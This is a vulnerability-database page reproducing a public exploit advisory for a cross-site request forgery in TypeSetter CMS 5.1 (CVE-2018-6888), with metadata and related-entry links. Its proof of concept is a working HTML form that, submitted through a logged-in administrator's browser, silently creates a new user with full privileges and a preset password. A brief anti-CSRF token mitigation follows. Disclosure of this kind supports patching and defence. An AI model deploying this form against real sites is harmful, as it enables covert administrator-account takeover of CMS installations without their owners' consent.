Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNavina AsraniPACKETSTORM:146397
HistoryFeb 14, 2018 - 12:00 a.m.

TypeSetter CMS 5.1 Cross Site Request Forgery

2018-02-1400:00:00
Navina Asrani
packetstormsecurity.com
23

EPSS

0.001

Percentile

51.0%

JSON
`# Exploit Title: TypeSetter CMS 5.1 Cross Site Request Forgery  
# Date: 10-02-2018  
# Exploit Author: Navina Asrani  
# Contact: https://twitter.com/NavinaSanjay  
# Website: https://securitywarrior9.blogspot.in/  
# Vendor Homepage: https://www.typesettercms.com/  
# Version: 5.1  
# CVE : NA  
# Category: Webapp CMS  
  
1. Description  
  
The application allows malcious HTTP requests to be directly executed without any hidden security token.This may lead to user account takeover or malious command execution  
  
2. Proof of Concept  
  
Exploit code:  
  
<html>  
<body>  
<form action="http://localhost/cms/Admin/Users" method="POST">  
<input type="hidden" name="verified" value="475f10871b08f44c20dab5bc2cb55d17946e6c98fa8abf28c64a5a9dab0ee2e122fefcc29cae9cc2e48daf564bfe55665e26b2b2174dee14e83c5e6974cf3218" />  
<input type="hidden" name="username" value="samrat_test" />  
<input type="hidden" name="password" value="sam9318" />  
<input type="hidden" name="password1" value="sam9318" />  
<input type="hidden" name="algo" value="password_hash" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="grant_all" value="all" />  
<input type="hidden" name="cmd" value="newuser" />  
<input type="hidden" name="aaa" value="Save" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
  
3. Solution:  
  
To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokensa  
  
  
`

Related

prion 1
zdt 1
nvd 1
exploitdb 1
cve 1
osv 1
cvelist 1
prion
prion
Cross site request forgery (csrf)
2018-02-12 03:29:00
zdt
zdt
TypeSetter CMS 5.1 - Cross-Site Request Forgery Vulnerability
2018-02-13 00:00:00
nvd
nvd
CVE-2018-6888
2018-02-12 03:29:00
exploitdb
exploitdb
TypeSetter CMS 5.1 - Cross-Site Request Forgery
2018-02-13 00:00:00
cve
cve
CVE-2018-6888
2018-02-12 03:29:00
osv
osv
CVE-2018-6888
2018-02-12 03:29:00
cvelist
cvelist
CVE-2018-6888
2018-02-12 03:00:00

EPSS

0.001

Percentile

51.0%

JSON
Related for PACKETSTORM:146397
prion1zdt1nvd1exploitdb1cve1osv1cvelist1